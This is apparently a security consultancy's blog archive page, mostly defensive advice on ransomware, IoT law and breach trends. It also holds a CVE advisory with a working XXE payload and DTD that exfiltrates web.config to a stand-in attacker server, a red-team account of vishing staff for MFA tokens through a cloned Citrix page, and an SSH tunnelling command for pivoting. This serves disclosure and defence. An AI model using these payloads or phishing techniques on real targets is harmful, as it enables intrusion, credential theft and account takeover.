Experiencing a Security Breach?
contact@prisminfosec.com +44 (0) 1242 652 100 +44 (0) 1242 652 100

Category: Blog Posts

How to Protect the Business Against a Data Breach/Ransomware

Posted on by Prism Infosec

Threats to the business can come in various forms but by far the most common and significant is a data breach. Usually leveraged via a successful phishing or spear phishing attack, this then results in either sensitive information (such as a username and/or password) being disclosed or a compromise of target endpoints such as laptops or mobile devices 

Both attack vectors could then see unauthorised remote logins to organisational services or data, which an attacker can then use to exfiltrate sensitive information. This could include personal data (names, addresses, dates of birth, medical data et al), banking details, credit card information, or company intellectual property. 

The information will then either be sold (usually at a price per record), used to target other individuals with fraudulent attacks, or be associated with a ransomware situation where either it may then be permanently encrypted and/or released publicly if the attackers do not receive payment within a certain time. Over the last few years, it’s this latter scenario that has come to dominate, as organised criminal gangs become more adept at extorting funds from targets.

Are you prepared?

Yet, despite the dearth of data breaches reported year after year, organisations still fail to prepare for what is rapidly becoming almost inevitable. If the business isn’t ready, it can’t respond effectively or communicate with internal and external stakeholders such as customers and clients, C-Suite and third-party organisations such as the ICO. This results in a loss of confidence and unwanted publicity, as well as the organisation spending unnecessary time resolving incidents effectively and the potential financial loss of paying the ransom. 

To protect themselves from such attacks, organisations should implement a variety of defences. It’s important to deliver regular security awareness programs to staff, warning of the risk of clicking on unknown links or opening files or attachments, for instance, but these need to be regularly scheduled and be appropriate. The most effective security awareness briefings will be relatively succinct and interesting to staff, for example by containing relevant and interesting examples of the potential impacts, rather than being a lecture.

With regards to technical security controls, the business should implement endpoint and cloud-based protection which can protect against known and new attacks and as well as monitoring and alerting systems to facilitate rapid identification and reporting of any potential attempts and actual breaches within the business environment. Also, put in place strong endpoint configuration that limits the privileges of users, restricts the execution of unknown and untrusted applications and reduces the attack surface through reduction of unnecessary functionality (Command Prompts, Powershell, default bundled software etc). 

Locking down data is essential so ensure that data storage is resilient to unauthorised attempts to modify files, using techniques such as inherent versioning and/or offline data snapshots and backups. Remain vigilant through the implementation of monitoring and alerting mechanisms across server, endpoint and cloud environments and keep things fresh through regular security reviews of device endpoints and data storage and applications to test their resilience to ransomware attacks. 

If the worst does happen, you’ll want to rely on an effective incident response plan being in place as well as team preparedness, having conducted scenario-based penetration testing (“red team”) attack simulations as well as desktop simulated breach exercises to ensure that the security teams know how to handle breaches quickly and effectively.

Policy and process

However, it cannot be overstated how important it is to have a reasonable and applicable (to the business) set of security policies, procedures and plans to support information security and to govern user behaviour. 

An overarching information security policy should put security centre stage and reveal the management commitment to it as well as prescribing a framework of other documents such as an acceptable use policy, incident response plan, access control and data handling policies. Many organisations are now already aligned or certified to standards such as ISO27001, which provides a framework for management of an information security management system (ISMS). 

Be Proactive

Finally, be proactive. Regularly review the data that is being collected and stored by the organisation, whether on-premise or in the cloud, assess its importance to the business and ensure that there are suitable controls in place to protect it from exposures and loss. Ensure that offline backups, snapshots, and/or data versioning exist and consider the impact of data being deleted, encrypted or leaked. Regularly advise your staff on existing and new cyber security threats, and consider future and evolving attacks such as voice/messaging attacks, as detection of email based phishing attacks forces attackers to seek alternative avenues.

CVE-2022-34001 – XML External Entity (XXE) in Unit 4 ERP 7.9 (Also Known As “Agresso”)

Posted on by Prism Infosec

Prism Infosec Identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.

Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.

CVE-2022-34001 – Proof of Concept

The ERP API supported the use of SOAP calls; Curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body.  To test for XXE, Prism used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed for entity expansion, and also allowed the SYSTEM call. 

The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
</Variant>
        <Xml>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]>
</Xml>
      </input>
<credentials>
…[REDACTED]…
</credentials>

This resulted in an HTTP request to the Prism Infosec controlled server:

The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.

GET / HTTP/1.1
Host: burp_collaborator.com

Connection: Keep-Alive

This confirms that entity expansion was enabled, along with being able to leverage protocols such as HTTP and FILE. As SOAP request only responded with an error message, this attack was considered ‘blind’ – so out of band techniques were required to exfiltrate data from the host. 

On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):

<!ENTITY % start "<[CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config">
<!ENTITY % goout "<!ENTITY &#37; pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile;
%end;'>">

The SOAP call was then initiated but referencing the malicious DTD along with the parameter entities to exfiltrate the data:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[
<!DOCTYPE doc[
<!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml">
%dtd;
%goout;
%pop;
]>
]]>
</Xml>
</input>
--[Cut]--

On the attacker controlled server, a listener was set up to serve the malicious DTD, and also catch the contents of the file being read:

Serving HTTP on 0.0.0.0 port 8000 ...
api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 -
api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,

%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections

--[Cut]--

The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:

/<[CDATA[
<!--
  For more information on how to configure your ASP.NET application, please visit 
  http://go.microsoft.com/fwlink/?LinkId=301879
  -->
<configuration>
  <configSections>
    <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" />
  </configSections>
--[Cut]—

The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network; mapping out the internal network, and making arbitrary requests to any internal hosts. 

Prism Infosec contacted the vendor (Unit 4); and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely matter and started working on a fix for all customers. 

Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected. 

Note: Prism Infosec did not confirm if the vulnerability had been patched; No further testing was conducted after the initial engagement. 

Timeline – CVE-2022-34001

  • Discovered by Prism Infosec during an engagement for client: March 1st 2022
  • Vendor Informed: March 17th 2022
  • CVE Assigned: June 19th 2022
  • Vendor Confirmed Fix, and communicated to customers: July 7th 2022 
  • Prism Infosec Blog Post: July 19th 2022

Vulnerability was discovered and written by Alexis Vanden Eijnde of Prism Infosec.

What is the PSTI and will it improve IoT security?

Posted on by Prism Infosec

By Phil Robinson

The new Product Security and Telecommunications Infrastructure (PSTI) Bill currently going through parliament comprises two parts. The first aims to put in place safeguards to regulate the secure design of the Internet of Things (IoT) while the second will ensure broadband and 5G networks are gigabit-grade. It’s the first part that has caused a stir because it will, for the first time, see the introduction of enforceable regulation. 

Applicable to consumer products such as smartphones, connected cameras, TVs and speakers, fitness trackers, toys, white goods such as smart washing machines and fridges and home equipment such as smoke detectors and door locks, home automation and alarm systems, the regulations stipulate that manufacturers must:

  • Not use default passwords
  • Have a vulnerability disclosure policy
  • Be open about the length of time the product will be supported with security updates

Yet, while the move to regulate the IoT is regarded as long overdue, the PSTI has been criticised for not going far enough, particularly given the number of well-documented security vulnerabilities exhibited by smart technology.

Why is the IoT so insecure?

The root cause of the majority of issues that have plagued consumer hardware is that manufacturers are cost driven and aim to be quick to markets and in many cases this had led to shortcuts or a complete lack of information security during the design process. This has resulted in common security weaknesses long since addressed in more mature software and hardware products, such as default usernames and passwords or straightforward password bypasses, weak encryption (hashes) for password storage and a lack of encryption for data transfer across open networks for administrative traffic, being widely used in the IoT. 

In addition, the sector has suffered from other issues. such as a lack of security around the firmware update processes (such as a lack of signing) and also hardware interface exposures that allow for straightforward access to low level functions of the device or its components (such as memory). And whereas it was hoped the sector would self-regulate, this doesn’t seem to have happened, with a report by the Internet of Things Security Foundation in 2020 finding that only 1 in 5 manufacturers had a disclosure process, meaning the majority could not be alerted to a security vulnerability.

Where does the PSTI fall short?

The bill currently addresses the most significant and easily exploitable weaknesses in IoT devices: the use of default passwords, however many other common security weaknesses have not been covered at this stage. That said, the use of default passwords is by far the most common way that an IoT device will be compromised and it is a significant first step in improving the security of these products. 

Focusing on default settings is also easy to establish whether the manufacturer is in breach of the bill, whereas other measures (such as ensuring a stringent code review process to identify access control bypasses or input validation weaknesses) will not be so straightforward to ascertain. 

The bill also does not stipulate a minimum support period for security updates for consumers, thus manufacturers can still release products without a commitment to supporting it, leaving this decision in the hands of consumers who may not necessarily understand the risks.

Understandably perhaps, its not being retroactively deployed so won’t apply to the army of devices currently out there, and while manufacturers must have a disclosure channel, there’s no compunction or timeframe for them to notify their users of any reported vulnerability. Nor is there any focus on the patch management: users often find these difficult to implement so some move towards over-the-air or automated patching would have been welcome.

As mentioned above, there are many other vulnerabilities that can be used to exploit IoT devices, including disrupting administrative traffic, identifying and exploiting flaws in web or file transfer services running on the device, causing denial of service, interfering with the update process and deploying rogue firmware or exploiting the devices with physical access. 

So is the PSTI too little too late?

The PSTI is still winding its way through parliament and is unlikely to pass into law until 2023 but when it marks an important first step in the regulation of an industry that has previously been seen as playing fast and loose. It will force IoT product vendors around the world to consider the security associated with their consumer devices and will provide a baseline of protection for devices being sold to the public in the UK. And it will also see offending vendors held to account for the first time if they do not abide by the articles of this law. 

It’s important to remember that while the bill doesn’t cover as many of the security issues one might have hoped, it does cover the vulnerability with the highest likelihood and impact of exploitation. Other key requirements such as ensuring a vulnerability disclosure policy and ensuring transparent advice on the time that security updates will be released are also welcome measures and support the improvement of product security over time.

Knowing how long a product will be supported will help consumers make an informed decision and is likely to be used by consumer support organisations such as Which? To differentiate offerings. In many ways, it sets a bar by which vendors can be measured and could lead to the emergence of consumer kitemarks so that security becomes not a sunk cost but a differentiating factor that manufacturers can use to boost sales.

IoT devices do, of course, also impact the corporate environment either because users seek to use these on the network or by acting as potential conduits for an attack, such as ransomware or the large scale DDoS attacks we saw carried out by the Mirai botnet that enslaved thousands of IoT devices. Consequently, the PSTI will affect businesses too and, depending on how the regulation evolves, it could even have a direct impact on security team workloads, particularly if it seeks to address patch management in the future.

Let’s Go Phishing

Posted on by Prism Infosec

Kian J recounts a recent simulated phishing engagement delivered to a major financial organisation

We recently completed a project for a major financial organisation which saw us deliver a red team engagement covering three scenarios. The first involved a simulated phishing attack and we thought it worth sharing the procedures used by our consultants to gain complete, persistent, unauthorised access to the company’s internal network.

Before we embarked upon the exercise, we needed to assess the requirements of the phishing campaign and pick a campaign profile that was a best fit for the use case. Examples of possible attacks included:

  • Email Phishing
  • URL/HTTPs Phishing
  • Spear Phishing
  • Whale Phishing
  • Vishing
  • Smishing
  • Angler Phishing
  • Pharming
  • Clone Phishing

Note: this is not a complete list of attacks, but only a handful that would be considered in a remote phishing engagement.

Due to the engagement requirements, we had decided that the best approach would be a multi-pronged campaign, consisting of vishing, email phishing and URL phishing.

Initially, we used email, however, it quickly became apparent that users had been trained in this area, resulting in burnt accounts which we were able to diagnose due to a high bounce back rate on our emails. Despite running the assault over a couple of days with various attack vectors, it all led to the same result – with our account or domain being blacklisted.

At this stage the natural conclusion would have been to assume that the staff had received adequate training in phishing engagements. However, we decided to give it one last shot using a vishing campaign conducted using URL phishing.

We continued with our OSINT efforts, specifically scraping phone numbers from various sites such as rocketreach.io and lusha.com to put together a new target list. Ideally, we wanted this new list to consist of higher value targets such as developers or technical leadership roles. The purpose of this was that once we landed in the environment, we would hopefully have more privileges enabling us to escalate access. This resulted in a target list consisting of 31 phone numbers.The next step we needed to take was to get the staff to either visit a malicious site or to give us their username, password, and MFA token over the phone. We figured the first solution would have a better outcome (this is where the URL phishing comes into play). So, we went through the endpoints we had access to and decided that we would clone a Citrix site, and had created the following page:

Citrix Login
Citrix Gateway Login Screen

The page, after submitting credentials would then ask for a MFA token:

Citrix Login
Login Requesting an MFA Token Value

Great, now we had a target list and a malicious site (hosted in AWS to bypass any proxy filtering) and so were primed and ready to begin the vishing attack. 

On our first call we managed to get a hold of someone I will refer to as “Mark”. We than ran through a simple script with him, explaining that we were swapping over Citrix environments and needed to test the database changeover had worked.

Mark was a great help throughout the assessment, but specifically on this call, he gave us a vital piece of information; the Citrix authentication was being handled by Microsoft single-sign-on (SSO) and that the page wasn’t sending him the SMS. We quickly got another consultant on the case to process the request (by submitting the credentials into their legitimate site) which would then force the SMS process to kick off.

We then called Mark back and, as we were already friendly with him, went through the same process. Mark then submitted the newly generated MFA token, an example of the output of which can be seen here:

Phished Credentials
Receiving the Credentials from our Target

Mark was then forwarded straight to their legitimate landing page, and it appeared as though sign-in was successful; this was caused by their time-out periods being overly long.

Perfect! So now we had Mark’s username, password, and an MFA token, but if we wanted to access the Citrix environment consistently, we would need multiple tokens.  As it worked out, we had an easy solution to bypass this: the Microsoft Authentication application. We proceeded to log in to the app with Marks details:

Authenticator Screen
Microsoft Authenticator App

This then reflected on the website, adding two new options to the user:

Login Screen with Auth Options
The login then allowed use of the Authenticator

The two new options, “Approve a request on my Microsoft Authentication app” and “Use a verification code from my mobile app” were now the only indicators that the user had been compromised, however this did not lead to the campaign being discovered.

Finally, after a week of attempts, we had established a means of gaining complete, persistent, unauthorised access to the company’s internal network. From this point, we were then able to compromise another two accounts, totaling three before we decided that it was no longer going to provide us with an advantage and disclosing to the client.

In conclusion, we think there are two key recommendations not just for the company concerned but for anyone else who thinks they’ve covered the bases when it comes to phishing attacks. Firstly, we would advise that staff are trained in different forms of phishing attacks, such as email attacks and vocal attacks. Staff can quickly let their guard down when different channels are used. Secondly, we would also advise that any unmanaged devices are blocked, or at least have heavy restrictions placed upon them.

If you’d like to talk to us about how we can help test your resilience to a phishing attack, do contact us at contact@prisminfosec.com or call us on 01242 652 100.

ICO data reveals sharp rise in attacks

Posted on by Prism Infosec

Recent data from the Information Commissioner’s Office (ICO) Data Security Trends Analysis Q1 2021-22 (capturing incidents for the period 1 April – 30 June 2021) reveal there’s been a sharp rise in specific cyber attacks as attackers seek to capitalise on the disruption caused by the pandemic and working from home (WFH).

The biggest leap was in misconfigurations of software and hardware, up a staggering 543% from 7 incidents last year to 45. This reflects the rapid expansion within the cloud as businesses sought to roll-out remote working to enable WFH. Misconfigurations routinely top the list of cloud security issues due to a failure to configure cloud solutions. Left in their default settings, these systems become much easier to compromise when exploits then surface. 

There was also a marked increase in attacks against the user. Malware was up a third and phishing attacks were up 54% compared to the same time last year while ransomware more than doubled due to the growth of Ransomware-as-a-Service (RaaS). RaaS enables cyber criminals to use malware for extortion without the need to code it themselves and was responsible for two thirds of all campaigns during 2020. 

This year also saw the ICO also include cryptographic flaws and denial of service attacks which were omitted last year, indicating a growth in highly targeted organised attacks. The only attack type to buck the trend was unauthorised access which fell 28% from 87 to 63, but this could equally be due to the difficulty of detecting such an attack outside the corporate network.

The results show that many users have fallen victim to attack while WFH, let down by insufficient support and a failure to implement secure remote access. Staff training should have helped prevent phishing attacks, for instance, with virtual training sessions offered to help with reinforcement. The increase in malware also suggests inadequate protection of endpoints, no doubt caused by many relying on connecting from home on personal devices. 

Attack Trends 2020 – 2021

The ICO also helpfully breaks down these figures into specific sectors, and virtually all of them have seen an increase in incidents. The retail and manufacturing industries continue to suffer the highest volume of attacks but saw a relatively modest increase of 48% compared to some of the others. 

Perhaps not surprisingly given the disruption to normal working practices, it was the General Business sector that saw the greatest rise at 282%, closely followed by the Utilities sector at 250% and the Health sector at 238%. The Legal sector and Transport and Leisure both saw a tail-off in demand for their services during the pandemic but an uptick following the easing of lockdown, resulting in attacks increasing by 117% and 106%, respectively.

A sector that was relatively unscathed by the pandemic and able to maintain BAU was Online Technology and Telecoms. It saw an increase of only 14%, revealing that it was better able to defend its operations. Similarly, the Finance sector saw only a 2% increase and Local Government 6% while those operating in Social Care actually saw an 11% decrease in attacks.

Attacks by Sector 2020 – 2021

The results of the Data Security Trends Analysis 2021-22 suggest that many organisations struggled to put in place adequate security measures and adapt quickly enough to meet the demands for WFH. This then made it difficult to enforce security policies, leaving staff exposed. 

The question that now remains is how effectively these sectors can play catch-up. Given that we will have a hybrid workforce for the foreseeable future, its vital that organisations now identify where their security gaps lie. Most sectors have some work to do to better protect their infrastructure, data and staff.  

Our recommendations are to:

  • Focus on your users by improving identity and access management. Provide remote staff training so that they know how to connect securely. Use refresher training to remind staff of best practice for password management and how to avoid phishing and malware attacks.
  • Examine how you monitor remote devices and BYOD. Many security solutions are not designed to monitor endpoint devices and third-party connections so you may need to re-evaluate how you carry out remote network monitoring.
  • Address cloud security as a priority, particularly the configuration of cloud solutions, and ensure that you these down to the minimum requirements.
  • Put in place procedures to thwart brute force attempts such as 2FA, limit log-ins and failed log-in attempts and prevent root user access.
  • Adjust your Incident Response to ensure everyone knows what to do in the event of an attack. Check your Disaster Recovery plans to ensure you have back-ups and can perform effective remediation.

If you’d like some advice on how to make your business more resilient and your staff more secure, or if you’d like to assess how effective your current security measures are, we’re here to help. Email us at contact@prisminfosec.com or call 01242 652 100.

Threats and priorities for 2022

Posted on by Prism Infosec

Phil Robinson, December 23rd 2021

Many businesses will still be grappling with the seismic shifts of the pandemic as they eye 2022. The rush to roll-out systems to support home working and to activate virtual versions of real-world business channels saw unprecedented digital transformation equivalent to years achieved in just a few months. But this rapid expansion came at a cost, leaving systems and networks overly exposed. 

We’re already seeing the manifestation of more attacks, with the World Economic Forum reporting a 50.1% increase in cyber attacks due to the pandemic with 30,000 related to COVID-19 as well as huge spikes in phishing and ransomware. This has caused many organisations to task their security teams with retroactively fixing any security gaps.

Our top three issues to address going into 2022 and beyond include:

  1. Cloud misconfiguration

Research claims 90% of businesses are now susceptible to attack due to misconfiguration so businesses need to identify and assess how well configured cloud systems are to enforce access restrictions, overly permissive storage policies, clamp down on compliance, apply least privilege and practice credential hygiene, and look at virtual network functions. At the same time, they can’t afford to stand still and need to continue to expand their cloud presence to remain competitive, so will need to focus on how they can continue to build-out in the cloud but in a more resilient fashion. 

2. Ransomware and phishing

Ransomware-as-a-service or RaaS gaining ground, synonymous with groups such as DarkSide, Babuk and Cuba. These attacks typically involve the installation of malware which comes about by employees installing new software or through the security team failing to lock-down admin privileges. 

Phishing can vary, from scatter gun email phishing, to targeted spear phishing, or text based attacks known as “smishing” . These attacks usually involve the attacker emailing or co-ercing an employee to execute a malicious file or visit a website to provide their credentials. This then allows the attacker to establish a command-and-control (C&C) server connection within the environment to establish a further foothold and attempt to escalate privileges. A recent example is the texts and emails offering an NHS pass/certificate for travel purposes with a request for payment (even though these are legitimately available for free via the NHS app).

Regularly educating users on how to spot phishing attacks and not to click on suspicious links or execute unknown attachments is imperative and you can make this relevant by running a test to see how many do fall foul of a staged attack. 

When it comes to the user device, businesses need to protect user workstations with anti-virus and EDR (Endpoint Detection and Response) solutions and to prevent the execution of unknown files or scripts as well as ensuring that all Operating Systems and applications are kept up to date. 

You can also stop a lot of this from getting through in the first place by blocking unnecessary file attachments at the email gateway or cloud solution (e.g. macro files, htm/html files, executable files/scripts) and marking inbound email as ‘EXTERNAL’. But you also need a failsafe so that in a worst-case scenario you’re prepared so ensure offline backups/snapshots are being made of critical data and regularly test that these can be restored.

3. Abuse of collaboration tools

We expect to see increased attempts to copy common notifications sent from business services such as Office 365 (e.g. sharing and encryption emails). Attackers could start utilising alternatives to email to attempt to deliver payloads and this could include messaging systems such as Teams. Additionally, there will be more attempts to exploit open file sharing mechanisms such as Onedrive and Sharepoint sites that allow guest access, which is more common than you might think.

If you’d like help with attack mitigation or remediation, cloud configuration or advice on how to make remote working more secure, email us at contact@prisminfosec.com or call 01242 652 100 for a one-to-one consultation.

Alexis V elected to CREST-EU Council

Posted on by Prism Infosec

We’re proud to announce that Alexis V, Senior Security Consultant at Prism Infosec, has been elected to the newly formed CREST-EU Council. 

CREST, an international not-for-profit accreditation and certification body that represents and supports the technical information security market, announced its intention to form the Council and an EU Chapter at the end of October. Due to meet in the new year, the council will represent its international members in the European Union and will work to “ensure greater alignment with European initiatives”. 

CREST has been restructuring since 2006 by carrying out democratic elections to form country and regional councils. These councils will feed into a single International Council which will include representation from each region. These representations will enable its members to shape and influence CREST’s strategic initiatives as well as the global cyber security market at large.

Alexis was elected to one of just ten seats on the EU Council. With over ten years’ experience of working in the UK cyber security space, he has played a crucial role at Prism Infosec over the course of the past year by establishing our office in Belgium. He currently delivers a range of penetration testing services to clientele, assists with securing sales through scoping projects, and implements our training programme to help upskill members of the team. 

Commenting on his election, Alexis said: “I’m passionate about security and encouraging and supporting others to start their cyber security journey or develop their career. Growing the Belgian office by attracting new talent, getting involved in local initiatives and developing the team has been hugely rewarding and has allowed me to draw upon my previous experience delivering Advanced Web Application Testing training at BlackhHat USA. Going forward, I hope to replicate and improve upon some of the work we’ve done in the UK cyber security sector within the EU.”

Under his remit on the EU Council, Alexis hopes to be able to bridge the gap between the suppliers and consumers of security services and would like to ensure suppliers receive a consistent quality of service from within the industry which he believes can be achieved through reproducible methodologies. 

Responding to the news, Phil Robinson, Founder and Principal Consultant at Prism Infosec, said: “Alexis has such enthusiasm, knowledge and drive that I’m not at all surprised by his election. He continues to be a real asset to the Prism Infosec team and has been instrumental in our expansion and the setting up of our office in Belgium. He’s also represented the company on numerous speaking engagements where he has sought to increase awareness about new techniques and attack vectors and to promote industry best practice so he will be in his element and able to offer a unique perspective when he takes his seat on the EU Council”.

Was the NSA’s Cyber Security director right to say attackers know networks best?

Posted on by Prism Infosec

By Phil Robinson

There was an interesting spat on Twitter during September when Rob Joyce, Cyber Security Director of the National Security Agency, disputed the notion put forward by security researcher @RayRedacted that “Defenders think in lists, attackers think in graphs”. (Presumably suggesting that defenders are preoccupied with tick lists and compliance while attackers are looking at the data to see where performance discrepancies and chinks in the armour lie). Joyce’s retort was that…

“Attackers put in the time to know the network and the devices better than the defenders. That’s how they win.”

His statement suggests that far from being just opportunists, attackers study the network and carefully craft their attacks. Time is on their side, which allows them to explore and reverse engineer at their leisure. And the implication is that, if their knowledge of the network outpaces your own, they capture the castle. 

But is this really true? I’d argue that there are plenty of organisations that have a strong understanding of their IT estate and a decent awareness of their environment. They may even have implemented robust defences that have met or exceeded industry best practice across their technology stacks. They know every inch of their network and what’s running over it but this doesn’t guarantee they won’t be compromised. 

What’s really happening

Security breaches occur due to a number of reasons. These can range from a lack of coverage (OS and app patching), competence (configuration weaknesses), staff awareness (password insecurity), budget (holes in defence technology), or just plain bad luck (exploiting windows of opportunity) – so it’s not just a matter of good situational awareness.

The National Cyber Security Centre (NCSC) makes the distinction that the majority of attacks are stil not targeted. Some adopt a more scatter gun approach, such as phishing, water holing, ransomware and scanning, and these by far outnumber the more time intensive targeted attacks, with 27% of businesses being attacked once a week and 83% of these suffering phishing attacks according to the Cyber Security Breaches Survey 2021 by the DDCMS. 

There’s a good reason for this. Targeted attacks can take months of preparation and execution. The attacker will typically profile your business and probe the network for weaknesses to exploit using the oft quoted cyber kill chain approach. “Attacker time” tends to preoccupy the industry, which is why you’ll hear a lot about Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), which are terms used to hawk security solutions. But the truth is you need people and process – not just technology – to keep one step ahead of the attacker. 

What can you do?

There is no single solution or tool that can be deployed to protect against the possibility of a security breach, however, if the organisation uses a variety of proactive approaches it can reduce the likelihood of being caught unawares. Here is my top 5 list of “common sense” practices that can be used to protect an organisation and reduce the possibility of compromise..

  1. Staff/User Awareness – regular security awareness training which covers the dangers of common attacks (phishing / spear phishing etc) and educates on what to look for and how to report them quickly. Implement a “no blame” culture and encourage reports. What you don’t want are people covering their tracks for fear of reprisals from management.
  1. Device Security – ensure that devices (such as workstations and servers but also mobile devices and other networking hardware) are configured to be as secure as possible, with users having a low level of privilege, effective Anti-Virus (AV) and/or Endpoint Detection and Response (EDR) software deployed. Remove unnecessary software, follow best practice guides on hardening (e.g. NCSC and CIS) and limit execution of unknown executables and scripts (e.g. Microsoft Defender Application Control).
  1. Centralised Management – wherever possible use a centralised security management solutions (such as Mobile Device Management, centralised AV/EDR consoles and centralised patch management tools) to view and manage the estate. Do not leave the security of AV reports, patching, et al to the individual user/workstation level. This may seem like an expensive route – but solutions exist within cloud subscription fees (e.g. Microsoft 365 and Google Workspace)
  1. Logging and Event Reporting – in the absence of a SOC or SIEM solution, wherever logs and events can be enabled across the technology stack, make sure these are set-up and tuned. Ensure coverage at firewall, network device (switch/router), workstations, servers, applications and cloud services. Ensure that logging is not overwhelming to prevent alert fatigue and that key events are prioritised (e.g. multiple password failures, AV/EDR alerts, unexpected privilege escalation)
  1. Robust Authentication – many breaches (particularly for Internet-based services) occur due to weak passwords combined with a lack of additional controls such as multi-factor authentication (MFA) or password lockouts. Review all login interfaces (prioritising Internet-facing) and ensure that as many as possible support these security controls”

Taking such actions will bolster defences and take the weight off the IT/security team, allowing them to monitor and respond appropriately. And they’ll be able to mitigate attacks so that as and when they do occur you can limit incursions. This all makes logical sense but security is still being sidelined in many businesses, particularly in the wake of the pandemic.

The DDCMS 2021 survey reveals that a third of businesses took no remedial action following their most disruptive breach and it’s this inertia that then paves the way for repeat or lateral attacks. The report concludes that organisations need to “recognise that good cyber security facilitates better business resilience” and suggests many businesses have focused too much on business continuity at the expense of security due to the pandemic.

Develop your awareness

Ideally, you want to begin to look critically at your network from the perspective of the attacker and that’s where penetration testing or simulated testing comes in. There are also now frameworks that track the pattern of attacker activity. The  MITRE ATT&CK (an acronym that stands for Adversarial Tactics, Techniques and Common Knowledge) framework, identifies the tactics, techniques and procedures (TTP) attackers use and contains over 245 techniques. PRE-ATT&CK looks at attacker activity that happens prior to exploitation of a target network or system, providing some idea of how attackers scope attacks. The framework is continually updated so that new approaches spotted in the wild are added. 

Such frameworks can be used to help with penetration testing. This both identifies any security vulnerabilities and weaknesses and whether your controls are implemented and operating correctly and tests are configured to meet the needs of the business, so range in depth.

If you’d like to gain more visibility into your network to counter the ‘knowledge threat’ and to find out more what’s involved in pen testing your systems, email us at contact@prisminfosec.com or call +44 (0) 1242 652 100 for a quick consultation

No Shell? No Problem!

Posted on by Prism Infosec

Enumerating internal networks via ssh-tunnels, Alexis V, November 2021

On a recent engagement, we were tasked to assess the security of an Secure File Transfer Protocol (SFTP) server. We were provided with a regular account to facilitate the file uploads, and so proceeded to work our way through the common checks. We tried to:

  • Log in directly via SSH with the account – this failed as the user most likely had the shell set to /usr/bin/false or similar. 
  • Attempt command execution by appending a command right after SSH login: e.g. ssh user@host /bin/bash. This also failed as the sftp user was set up correctly. 
  • Log in via SFTP, which we did, and checked to see if we were in a chroot jail – as this turned out to be the case we could not access any other directories, files, etc.
  • Attempt SSH tunnelling with the valid account. This worked, as we were able to bind to an internal service via a command like:  ssh -CnfN -L 31337:127.0.0.1:22 user@host

Great, so far so good as we can now access the internal network and start searching for any services that we can exploit to gain a foothold. The problem is that this presents us with 65,535 ports to go through, and that’s just on the SSH host. It doesn’t include all the possible internal hosts. Going through all of these would be an extremely time consuming process if we did so manually.

Despite searching, I was unable to find any tools/scripts that would help me solve this problem, so we decided to write our own.

Flow Diagram of the Enumeration Technique

The concept was fairly simple and could be broken down into the following steps:

  • Create an SSH tunnel to an internal IP and port
  • Use netcat to prod the tunnel on the localhost 
  • Look for a ‘connect failed’ string from SSH, indicating a closed port
  • Or catch a timeout exception, indicating a valid port
  • Kill the tunnel and move on to the next internal IP and port

After a few hours, we had a working proof of concept that (albeit slow, with a small false positive rate) got the job done. Here’s a sample output of the tool running:

TunnelSweep Output

With this information, we can then bind to the known services, access them locally, and start exploiting them to help laterally move through the network.

We’ve uploaded the code to our GitHub. Note that the script was created during an assessment so is in no way optimised, it also sometimes reports false positives (although this can be reduced by setting a correct timeout variable in the script). We always appreciate pull requests!

Blog Post: Top 3 Common Networking Attacks

Posted on by Prism Infosec

Prism Infosec’s Senior Security Consultant, Aaron, reviews the “Top 3 Common Networking Attacks”​

